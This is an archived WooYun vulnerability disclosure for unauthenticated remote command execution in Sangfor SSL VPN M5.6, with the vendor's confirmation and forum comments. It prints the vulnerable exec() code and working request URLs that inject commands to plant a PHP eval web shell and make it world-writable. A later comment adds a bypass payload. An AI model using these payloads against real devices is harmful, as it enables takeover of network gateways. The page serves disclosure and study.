当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(57) 关注此漏洞

缺陷编号: WooYun-2013-17323

漏洞标题: 深信服ssl vpn远程代码执行漏洞

相关厂商: 深信服

漏洞作者: none

提交时间: 2013-01-15 11:48

公开时间: 2013-03-01 11:48

漏洞类型: 设计不当

危害等级: 中

自评Rank: 5

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php代码执行 远程代码执行 深信服不可信

21人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-15: 细节已通知厂商并且等待厂商处理中
2013-01-15: 厂商已经确认,细节仅向厂商公开
2013-01-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2013-03-11: 细节向核心白帽子及相关领域专家公开
2013-03-21: 细节向普通白帽子公开
2013-03-31: 细节向实习白帽子公开
2013-03-01: 细节向公众公开

简要描述:

深信服的程序员安全意识太低了,直接一个参数可以执行任意命令

详细说明:

$args = $_REQUEST['cmd'];

/*something here*/

exec("tsutil -proxy $ip $args", $output, $ret);



懂php exec函数的都一眼看出问题



版本SSLVPN M5.6及以下 没测试最新版本





http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php

sf.jpg



执行echo '<?php eval($_POST[cmd]);?>' >/app/usr/sbin/webui/html/svpn.php 生成一句话



http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod 777 /app/usr/sbin/webui/html/svpn.php

sf1.jpg



修改svpn权限

22.jpg





SSLVPN.SANGFOR.COM不是真实地址 只是一个例子

漏洞证明:

sf.jpg



sf1.jpg





22.jpg





$args = $_REQUEST['cmd'];

$ip = $_SERVER['REMOTE_ADDR'];

exec("tsutil -proxy $ip $args", $output, $ret);

修复方案:

哎 我还能说什么

去找人做个程序员安全编程意识培训吧

版权声明:转载请注明来源 none@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-01-15 14:52

厂商回复:

none提交的该漏洞,在M5.65版本及以上版本里已经修复,M5.6及以下版本有手动补丁包可以解决该问题。但考虑到漏洞本身的影响,依然评为高危漏洞。非常感谢!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
0%
100%
0%
0%
0%

评价

  1. 2013-01-15 12:10 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    这个不是不开源的么 不开源的很多应用都会有这个问题

    1# 回复此人
  2. 2013-01-15 12:32 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
    0

    嗯?

    2# 回复此人
  3. 2013-01-15 12:36 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    擦,深信服这是要火呀~

    3# 回复此人
  4. 2013-01-15 13:43 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)
    0

    原因 传参数 直接达成 命令行拼接执行 比SQL拼接还可怕

    4# 回复此人
  5. 2013-01-15 13:49 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    留名,要火

    5# 回复此人
  6. 2013-01-15 13:59 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)
    0

    =-=!纳尼,不登陆就可以执行啦?

    6# 回复此人
  7. 2013-01-15 15:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    厂商靠谱!

    7# 回复此人
  8. 2013-01-15 15:43 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)
    0

    厂商速度很快~

    8# 回复此人
  9. 2013-01-15 20:09 | qiaoy ( 普通白帽子 | Rank:122 漏洞数:17 )
    0

    .

    9# 回复此人
  10. 2013-01-16 02:29 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)
    0

    这种网络设备经常出现,比如中兴的设备。

    10# 回复此人
  11. 2013-01-16 09:25 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)
    0

    按照描述可知道 代码大致是类如这样的 system("chmod 777 $_REQUEST['file']");这样的 程序员也许有意识到file参数有&&会被HTTP过滤掉 但是||绝对是能达到效果的

    11# 回复此人
  12. 2013-01-16 09:25 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)
    1

    按照描述可知道 代码大致是类如这样的 system("chmod 777 $_REQUEST['file']");这样的 程序员也许有意识到file参数有&&会被HTTP过滤掉 但是||绝对是能达到效果的

    12# 回复此人
  13. 2013-01-16 09:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @无敌L.t.H 来两发

    13# 回复此人
  14. 2013-01-16 11:53 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)
    0

    @xsser 来点中兴 华三 锐捷 迈普的

    14# 回复此人
  15. 2013-03-12 18:03 | cncert国家互联网应急中心(乌云厂商)
    0

    这个漏洞才给了5分?有点少了。

    15# 回复此人
  16. 2013-03-14 11:24 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)
    1

    没堵住啊~哎 tsproxy.php?cmd=(ifconfig%20\'%20||echo%20"<? eval($_POST[cmd])?>" >any.php||a\')

    16# 回复此人
  17. 2013-03-14 11:28 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @none 再来一发

    17# 回复此人
  18. 2013-03-14 11:31 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)
    0

    PHP……用C就行了吧

    18# 回复此人
  19. 2013-03-18 14:24 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)
    0

    @无敌L.t.H 不在于用什么 而在于意识

    19# 回复此人

登录后才能发表评论,请先 登录